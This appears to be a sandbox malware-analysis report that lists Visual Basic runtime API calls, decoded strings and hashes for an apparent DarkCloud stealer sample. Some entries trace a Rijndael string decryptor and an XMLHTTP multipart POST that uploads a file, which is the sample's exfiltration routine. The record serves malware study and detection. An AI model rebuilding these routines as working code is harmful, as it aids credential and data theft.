                                                          • __vbaUbound.MSVBVM60(00000001), ref: 004272F8
                                                          • #681.MSVBVM60(?,0000000B,00000003,00004011), ref: 0042734A
                                                          • __vbaAryUnlock.MSVBVM60(?), ref: 00427354
                                                          • __vbaI2Var.MSVBVM60(?), ref: 0042735E
                                                          • __vbaFreeVarList.MSVBVM60(00000003,0000000B,00000003,?), ref: 00427375
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 0042739E
                                                          • __vbaStrMove.MSVBVM60(?,?,?,0000000B,?,?,00000000,00004002), ref: 00427440
                                                          • __vbaFreeStr.MSVBVM60(00000008,00006008), ref: 00427480
                                                          • __vbaFreeVar.MSVBVM60 ref: 00427489
                                                          • __vbaRedimPreserve.MSVBVM60(00000180,00000004,?,00000008,00000001,?,00000000), ref: 004274B9
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004274F1
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042750C
                                                          • __vbaStrMove.MSVBVM60(?,?,?), ref: 00427534
                                                          • __vbaVarTstEq.MSVBVM60(00008002,?), ref: 00427566
                                                          • __vbaAryLock.MSVBVM60(?), ref: 0042757C
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004275AD
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004275BE
                                                          • __vbaUbound.MSVBVM60(00000001), ref: 004275E1
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042762F
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00427643
                                                          • __vbaUbound.MSVBVM60(00000001), ref: 00427654
                                                          • #681.MSVBVM60(?,0000000B,00000003,00004011), ref: 004276A6
                                                          • __vbaAryUnlock.MSVBVM60(?), ref: 004276B0
                                                          • __vbaI2Var.MSVBVM60(?), ref: 004276BA
                                                          • __vbaFreeVarList.MSVBVM60(00000003,0000000B,00000003,?), ref: 004276D1
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 004276FA
                                                          • __vbaStrMove.MSVBVM60(?,?,?,0000000B,?,?,00000000,00004002), ref: 0042779C
                                                          • __vbaFreeStr.MSVBVM60(00000008,00006008), ref: 004277DC
                                                          • __vbaFreeVar.MSVBVM60 ref: 004277E5
                                                          • __vbaRedimPreserve.MSVBVM60(00000180,00000004,?,00000008,00000001,?,00000000), ref: 00427815
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042784D
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00427868
                                                          • __vbaStrMove.MSVBVM60(?,?,?), ref: 00427890
                                                          • __vbaVarTstEq.MSVBVM60(00008002,?), ref: 004278C2
                                                          • __vbaAryLock.MSVBVM60(?), ref: 004278D8
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00427909
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042791A
                                                          • __vbaUbound.MSVBVM60(00000001), ref: 0042793D
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042798B
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042799F
                                                          • __vbaUbound.MSVBVM60(00000001), ref: 004279B0
                                                          • #681.MSVBVM60(?,0000000B,00000003,00004011), ref: 00427A02
                                                          • __vbaAryUnlock.MSVBVM60(?), ref: 00427A0C
                                                          • __vbaI2Var.MSVBVM60(?), ref: 00427A16
                                                          • __vbaFreeVarList.MSVBVM60(00000003,0000000B,00000003,?), ref: 00427A2D
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00427A56
                                                          • __vbaStrMove.MSVBVM60(?,?,?,0000000B,?,?,00000000,00004002), ref: 00427AF8
                                                          • __vbaFreeStr.MSVBVM60(00000008,00006008), ref: 00427B38
                                                          • __vbaFreeVar.MSVBVM60 ref: 00427B41
                                                          • __vbaRedimPreserve.MSVBVM60(00000180,00000004,?,00000008,00000001,?,00000000), ref: 00427B71
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00427BA9
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00427BC4
                                                          • __vbaStrMove.MSVBVM60(?,?,?), ref: 00427BEC
                                                          • __vbaStrCopy.MSVBVM60 ref: 00427C02
                                                          • __vbaFreeStr.MSVBVM60 ref: 00427C0B
                                                          • __vbaAryMove.MSVBVM60(?,?), ref: 00427C49
                                                          • __vbaExitProc.MSVBVM60 ref: 00427C4F
                                                          • __vbaFreeVar.MSVBVM60(00427CC7), ref: 00427C9F
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00427CB4
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00427CBC
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00427CC4
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 00427CDD
                                                          • __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 00427D0E
                                                          • __vbaOnError.MSVBVM60(000000FF,?,00000000,6D4245C1,00000000,004030D6), ref: 00427D3E
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00427D88
                                                          • #712.MSVBVM60(?,0040A43C,00405638,00000001,000000FF,00000000), ref: 00427DA9
                                                          • __vbaStrMove.MSVBVM60 ref: 00427DB4
                                                          • __vbaAryMove.MSVBVM60(?,?,?), ref: 00427DD4
                                                          • __vbaFreeStr.MSVBVM60 ref: 00427DDD
                                                          • __vbaUbound.MSVBVM60(00000001,00000000,00000000), ref: 00427DFB
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000002), ref: 00427E1A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Error$BoundsGenerate$Ubound$Free$Move$Redim$#681ListLockUnlock$DestructPreserve$#573#712ChkstkCopyExitOverflowProc
                                                          • String ID: $0$013B331C3810262F625E4C$04233E1F1F312632$150E37381C26$172C3A023905$1B331E06210D113D2E1A39794F46$202C39342A1D070D20201E222A0A381832$2B3A353E1B3A203D0D0623020600162807$33250134392504126B5048$===============DARKCLOUD===============$BlockSize$CreateDecryptor$Item$Key$MNTVLbJTXiVBquwyZcTsld$Mode$Padding$System.Security.Cryptography.RijndaelManaged$TcDrGNJvvKjh$TransformFinalBlock$Url : $UyaPQrUXaRqkVqBTuLemrVD$VlLMkqPKWxGJQEliJlPhUt$`!@$fZCnjHnpIGuWYufYFuJTsZzMYQpNVmCSBggClUwgmL$keySize$lTHVnVqKJBd$uEBZFSmshDumGXdYuWpcplOStFWJkCkRfazgXDZGVGf$vyIBvpaiHxuLZzjYMbEbfFd
                                                          • API String ID: 2339242223-2799284628
                                                          • Opcode ID: 0aa991530f0138b0e912fbe64848bef25baf898777cbad4e2a8bc505298c3c53
                                                          • Instruction ID: 69a27fba8a8bb1aa44ce51dd9ea69ca7944159238cb36973c334c165effb367a
                                                          • Opcode Fuzzy Hash: 0aa991530f0138b0e912fbe64848bef25baf898777cbad4e2a8bc505298c3c53
                                                          • Instruction Fuzzy Hash: DB434A75E002189FDB14DFA4D984BEEBBB5FF48300F1081AEE50AAB291DB745A85CF54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b8c8975d0672eb8d9febd7d473504c5da8353890e5506594f0392ecb3feca656
                                                          • Instruction ID: bd41cdccd1b3342421176d3f0e086dba6e5a083b99d036acf6137c76ee296033
                                                          • Opcode Fuzzy Hash: b8c8975d0672eb8d9febd7d473504c5da8353890e5506594f0392ecb3feca656
                                                          • Instruction Fuzzy Hash: 01B133A008E3C05FD7178774496A5A27FB0AE8321470E46EBC9C4DF5F3D26C995AC32A
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,004030D6,?,?,0043347C,?,00402BF8,00000000), ref: 0043375E
                                                          • __vbaOnError.MSVBVM60(000000FF,6D41A323,6D42D8B1,6D42D8F4,?,004030D6), ref: 0043378E
                                                          • #648.MSVBVM60(0000000A), ref: 004337AD
                                                          • __vbaFreeVar.MSVBVM60 ref: 004337BA
                                                          • __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 004337D9
                                                          • #570.MSVBVM60(?), ref: 004337EB
                                                          • #570.MSVBVM60(?,00000000), ref: 00433807
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001), ref: 00433826
                                                          • __vbaGetOwner3.MSVBVM60(0040A444,?,?), ref: 00433844
                                                          • #717.MSVBVM60(?,00006011,00000040,00000000), ref: 00433870
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 0043387A
                                                          • __vbaStrMove.MSVBVM60 ref: 00433885
                                                          • __vbaFreeVar.MSVBVM60 ref: 0043388E
                                                          • __vbaFileClose.MSVBVM60(?), ref: 004338A0
                                                          • #709.MSVBVM60(00000000,004055A8,000000FF,00000000), ref: 004338BC
                                                          • __vbaStrCat.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,0040BBD8), ref: 004338E0
                                                          • __vbaStrMove.MSVBVM60 ref: 004338EB
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 004338F7
                                                          • __vbaStrMove.MSVBVM60 ref: 00433902
                                                          • __vbaStrCat.MSVBVM60(Content-Disposition: form-data; name="document"; filename=",00000000), ref: 0043390E
                                                          • __vbaStrMove.MSVBVM60 ref: 00433919
                                                          • #631.MSVBVM60(0000000A,?,0000000A,00000000), ref: 0043393A
                                                          • __vbaStrMove.MSVBVM60 ref: 00433945
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0043394C
                                                          • __vbaStrMove.MSVBVM60 ref: 00433957
                                                          • __vbaStrCat.MSVBVM60(00409DD4,00000000), ref: 00433963
                                                          • __vbaStrMove.MSVBVM60 ref: 0043396E
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 0043397A
                                                          • __vbaStrMove.MSVBVM60 ref: 00433985
                                                          • __vbaStrCat.MSVBVM60(Content-Type: application/octet-stream,00000000), ref: 00433991
                                                          • __vbaStrMove.MSVBVM60 ref: 0043399C
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 004339A8
                                                          • __vbaStrMove.MSVBVM60 ref: 004339B3
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 004339BF
                                                          • __vbaStrMove.MSVBVM60 ref: 004339CA
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 004339D5
                                                          • __vbaStrMove.MSVBVM60 ref: 004339E0
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 004339EC
                                                          • __vbaStrMove.MSVBVM60 ref: 004339F7
                                                          • __vbaStrCat.MSVBVM60(0040BBD8,00000000), ref: 00433A03
                                                          • __vbaStrMove.MSVBVM60 ref: 00433A0E
                                                          • __vbaStrCat.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,00000000), ref: 00433A1A
                                                          • __vbaStrMove.MSVBVM60 ref: 00433A25
                                                          • __vbaStrCat.MSVBVM60(0040BBD8,00000000), ref: 00433A31
                                                          • __vbaStrMove.MSVBVM60 ref: 00433A3C
                                                          • __vbaFreeStrList.MSVBVM60(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00433A7C
                                                          • __vbaFreeVar.MSVBVM60 ref: 00433A88
                                                          • #716.MSVBVM60(?,Microsoft.XMLHTTP,00000000), ref: 00433AA0
                                                          • __vbaVarZero.MSVBVM60 ref: 00433AAF
                                                          • __vbaChkstk.MSVBVM60 ref: 00433B04
                                                          • __vbaChkstk.MSVBVM60 ref: 00433B2D
                                                          • __vbaChkstk.MSVBVM60 ref: 00433B5C
                                                          • __vbaObjVar.MSVBVM60(?,Open,00000003), ref: 00433B94
                                                          • __vbaLateMemCall.MSVBVM60(00000000), ref: 00433B9B
                                                          • __vbaStrCat.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,multipart/form-data; boundary=), ref: 00433BC6
                                                          • __vbaChkstk.MSVBVM60 ref: 00433BDB
                                                          • __vbaChkstk.MSVBVM60 ref: 00433C04
                                                          • __vbaObjVar.MSVBVM60(?,SetRequestHeader,00000002), ref: 00433C30
                                                          • __vbaLateMemCall.MSVBVM60(00000000), ref: 00433C37
                                                          • __vbaFreeVar.MSVBVM60 ref: 00433C43
                                                            • Part of subcall function 00433DC0: #717.MSVBVM60(?,?,00000080,00000000,6D41A323,6D42D8B1,6D42D8F4), ref: 00433E0F
                                                            • Part of subcall function 00433DC0: __vbaVar2Vec.MSVBVM60(?,?), ref: 00433E1D
                                                            • Part of subcall function 00433DC0: __vbaAryMove.MSVBVM60(?,?), ref: 00433E2B
                                                            • Part of subcall function 00433DC0: __vbaFreeVar.MSVBVM60 ref: 00433E34
                                                          • __vbaChkstk.MSVBVM60(?), ref: 00433C68
                                                          • __vbaObjVar.MSVBVM60(?,Send,00000001,?), ref: 00433C94
                                                          • __vbaLateMemCall.MSVBVM60(00000000), ref: 00433C9B
                                                          • __vbaFreeVar.MSVBVM60 ref: 00433CA7
                                                          • __vbaVarLateMemCallLd.MSVBVM60(00002011,?,ResponseText,00000000), ref: 00433CD5
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 00433CDF
                                                          • __vbaStrMove.MSVBVM60 ref: 00433CEA
                                                          • __vbaFreeVar.MSVBVM60 ref: 00433CF3
                                                          • __vbaFreeVar.MSVBVM60(00433DA2), ref: 00433D77
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00433D86
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00433D92
                                                          • __vbaFreeStr.MSVBVM60 ref: 00433D9B
                                                          • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00433DB8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$Chkstk$CallLate$#570#717DestructErrorFile$#631#648#709#716CloseListOpenOverflowOwner3RedimVar2Zero
                                                          • String ID: 3fbd04f5-b1ed-4060-99b9-fca7ff59c113$Content-Disposition: form-data; name="document"; filename="$Content-Type$Content-Type: application/octet-stream$Microsoft.XMLHTTP$Open$POST$ResponseText$Send$SetRequestHeader$multipart/form-data; boundary=
                                                          • API String ID: 2419222664-2892837455
                                                          • Opcode ID: 9b3dd352fb8597096a7947ced147fcab4abf5c339d60ff12e7058089d33db6f1
                                                          • Instruction ID: 843c1557afdae08a8ab1e1ceb0dcaac502338ed626f3d5af09d51046d44df673
                                                          • Opcode Fuzzy Hash: 9b3dd352fb8597096a7947ced147fcab4abf5c339d60ff12e7058089d33db6f1
                                                          • Instruction Fuzzy Hash: 2F02D675900208DFDB14DFA4DD88BDEBBB5FB48301F20826AE506B72A1DB745A85CF58
                                                          APIs
                                                            • Part of subcall function 00432090: __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004320ED
                                                            • Part of subcall function 00432090: #632.MSVBVM60(?,?,00000000,?,?,?,00000000), ref: 00432131
                                                            • Part of subcall function 00432090: __vbaVarMove.MSVBVM60(?,?,00000000), ref: 00432140
                                                            • Part of subcall function 00432090: __vbaFreeVar.MSVBVM60(?,?,00000000), ref: 00432149
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(00004008,?,?,?,00000000), ref: 00432169
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(?,?,?,?,?,00000000), ref: 00432189
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(00004008,?,?,?,?,00000000), ref: 004321A9
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(?,?,?,?,?,00000000), ref: 004321C9
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(?,?,?,?,?,00000000), ref: 004321E9
                                                          • #632.MSVBVM60(?,?,?,?,H*@,?,6D51C2DA,00000000,?), ref: 00430F1F
                                                          • __vbaStrVarMove.MSVBVM60(?,?,?,H*@,?,6D51C2DA,00000000,?), ref: 00430F29
                                                          • __vbaStrMove.MSVBVM60(?,?,H*@,?,6D51C2DA,00000000,?), ref: 00430F3A
                                                          • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,H*@,?,6D51C2DA,00000000,?), ref: 00430F46
                                                          • __vbaLenBstr.MSVBVM60(00000000,6D51C2DA,00000000,?), ref: 00430F64
                                                          • #632.MSVBVM60(?,00004008,?,00000002), ref: 00430FA8
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 00430FB2
                                                          • __vbaStrMove.MSVBVM60 ref: 00430FBD
                                                          • __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 00430FC9
                                                          • __vbaStrCopy.MSVBVM60 ref: 00430FD8
                                                          • __vbaStrCmp.MSVBVM60(004055A8,?), ref: 00430FED
                                                          • #632.MSVBVM60(?,00004008,-00000001,00000002), ref: 0043102C
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 00431036
                                                          • __vbaStrMove.MSVBVM60 ref: 00431041
                                                          • __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0043104D
                                                          • __vbaStrCopy.MSVBVM60 ref: 0043105F
                                                          • __vbaStrCmp.MSVBVM60(00409DD4,?), ref: 00431071
                                                          • __vbaStrCmp.MSVBVM60(004055A8,?), ref: 00431087
                                                          • __vbaStrCmp.MSVBVM60(0040505C,?), ref: 0043109D
                                                          • __vbaStrCmp.MSVBVM60(0040B69C,?), ref: 004310B3
                                                          • __vbaStrCmp.MSVBVM60(0040B6B4,?), ref: 004310C9
                                                          • __vbaStrCat.MSVBVM60(0040B6BC,?), ref: 004310D8
                                                          • __vbaStrMove.MSVBVM60 ref: 004310E3
                                                          • __vbaStrCmp.MSVBVM60(0040B6AC,?), ref: 004310F6
                                                          • __vbaStrCat.MSVBVM60(0040B6C4,?), ref: 00431105
                                                          • __vbaStrMove.MSVBVM60 ref: 00431110
                                                          • __vbaStrCopy.MSVBVM60 ref: 0043111F
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00431133
                                                          • __vbaStrCopy.MSVBVM60 ref: 0043113D
                                                          • __vbaStrMove.MSVBVM60 ref: 00431150
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrMove.MSVBVM60(?,?,?), ref: 0043116B
                                                          • __vbaStrCmp.MSVBVM60(00000000), ref: 0043116E
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 0043118F
                                                          • __vbaStrCat.MSVBVM60(0040B6CC,?), ref: 004311A6
                                                          • __vbaStrMove.MSVBVM60 ref: 004311B1
                                                          • __vbaStrCopy.MSVBVM60 ref: 004311D3
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004311E3
                                                          • __vbaStrCopy.MSVBVM60 ref: 004311ED
                                                          • __vbaStrMove.MSVBVM60 ref: 004311FC
                                                          • __vbaStrMove.MSVBVM60(?,?,?), ref: 00431217
                                                          • __vbaStrCmp.MSVBVM60(00000000), ref: 0043121A
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 0043123F
                                                          • __vbaStrCat.MSVBVM60(0040B6D4,?), ref: 00431256
                                                          • __vbaStrMove.MSVBVM60 ref: 00431261
                                                          • __vbaStrCmp.MSVBVM60(0040B6A4,?), ref: 00431287
                                                          • __vbaStrCat.MSVBVM60(004075A8,?), ref: 00431296
                                                          • __vbaStrMove.MSVBVM60 ref: 004312A1
                                                          • __vbaStrCmp.MSVBVM60(0040B6DC,?), ref: 004312C1
                                                          • #632.MSVBVM60(?,00004008,-00000001,00000002), ref: 00431300
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 00431310
                                                          • __vbaStrMove.MSVBVM60 ref: 00431317
                                                          • __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 00431323
                                                          • __vbaStrCat.MSVBVM60(?,0040B6E4), ref: 00431342
                                                          • __vbaStrMove.MSVBVM60 ref: 0043134D
                                                          • #581.MSVBVM60(00000000), ref: 00431350
                                                          • __vbaFpI4.MSVBVM60 ref: 00431356
                                                          • #698.MSVBVM60(00000002,00000000), ref: 00431361
                                                          • __vbaVarAdd.MSVBVM60(?,00000002,00000008), ref: 00431373
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 0043137A
                                                          • __vbaStrMove.MSVBVM60 ref: 00431381
                                                          • __vbaFreeStr.MSVBVM60 ref: 00431386
                                                          • __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 00431396
                                                          • __vbaStrCat.MSVBVM60(?,?), ref: 004313B1
                                                          • __vbaStrMove.MSVBVM60 ref: 004313BC
                                                          • __vbaStrCmp.MSVBVM60(?,?), ref: 004313CB
                                                          • __vbaStrCat.MSVBVM60(?,?), ref: 004313D9
                                                          • __vbaStrMove.MSVBVM60 ref: 004313E4
                                                          • __vbaFreeStrList.MSVBVM60(00000002,?,?,00431478), ref: 00431459
                                                          • __vbaFreeStr.MSVBVM60 ref: 0043146B
                                                          • __vbaFreeStr.MSVBVM60 ref: 00431470
                                                          • __vbaFreeStr.MSVBVM60 ref: 00431475
                                                          • __vbaErrorOverflow.MSVBVM60(6D51C2DA,00000000,?), ref: 0043148E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$List$#632Copy$Bstr$#516#631$#537#581#608#698ErrorOverflow
                                                          • String ID: H*@$IKtURdOrQrJTUtVlROvWiJksPlxjRXfYF$xkkmUOcnApOwfnMrtRiLqYdmoMgvcQZQmvQyWtcMFt
                                                          • API String ID: 2359777993-3665930674
                                                          • Opcode ID: cd28e77be0078b63d90f20bfcb5e4e65dae47d6d4f20bbb5590f6c8db0beaba6
                                                          • Instruction ID: b9b5ffc12ea54c4bd0cdd54bfa319bf6882a5c54f90221c1218fe6ef8a3543d2
                                                          • Opcode Fuzzy Hash: cd28e77be0078b63d90f20bfcb5e4e65dae47d6d4f20bbb5590f6c8db0beaba6
                                                          • Instruction Fuzzy Hash: A1022AB19002099FDB14DFA4DD85EEEBBB8FF58300F10412AE546B7264EB74A945CF68
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0041B8AE
                                                          • __vbaOnError.MSVBVM60(000000FF,004019D0,-00000001,6D4FEC2C,00000000,004030D6), ref: 0041B8DE
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0041B8FE
                                                          • __vbaVarMove.MSVBVM60 ref: 0041B91D
                                                          • __vbaLenBstr.MSVBVM60 ref: 0041B930
                                                          • __vbaStrCat.MSVBVM60(0040796C,?), ref: 0041B9A0
                                                          • __vbaStrMove.MSVBVM60 ref: 0041B9AE
                                                          • #631.MSVBVM60(00000002,-00000001,00000002,00000000), ref: 0041B9CF
                                                          • __vbaStrMove.MSVBVM60 ref: 0041B9DD
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0041B9E4
                                                          • __vbaStrMove.MSVBVM60 ref: 0041B9F2
                                                          • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041BA08
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041BA17
                                                          • __vbaAryMove.MSVBVM60(?,?,?), ref: 0041BA4D
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041BA6D
                                                          • __vbaRecAssign.MSVBVM60(004050BC,?,?,?), ref: 0041BA98
                                                          • __vbaAryCopy.MSVBVM60(?,?), ref: 0041BAC4
                                                          • __vbaUI1I2.MSVBVM60 ref: 0041BADA
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041BB10
                                                          • __vbaAryCopy.MSVBVM60(?,?,?), ref: 0041BB36
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041BB56
                                                          • __vbaRecAssign.MSVBVM60(004050BC,?,?,?), ref: 0041BB81
                                                          • __vbaAryCopy.MSVBVM60(?,?), ref: 0041BBA3
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041BBD5
                                                          • __vbaRecAssign.MSVBVM60(004050BC,?,?,?), ref: 0041BC00
                                                          • __vbaVarMove.MSVBVM60 ref: 0041BC30
                                                          • __vbaAryCopy.MSVBVM60(?,?), ref: 0041BC45
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 0041BC5F
                                                          • __vbaVarMul.MSVBVM60(00000008,00000002,?,00000003,00000000), ref: 0041BCA4
                                                          • __vbaVarSub.MSVBVM60(?,00000000), ref: 0041BCB2
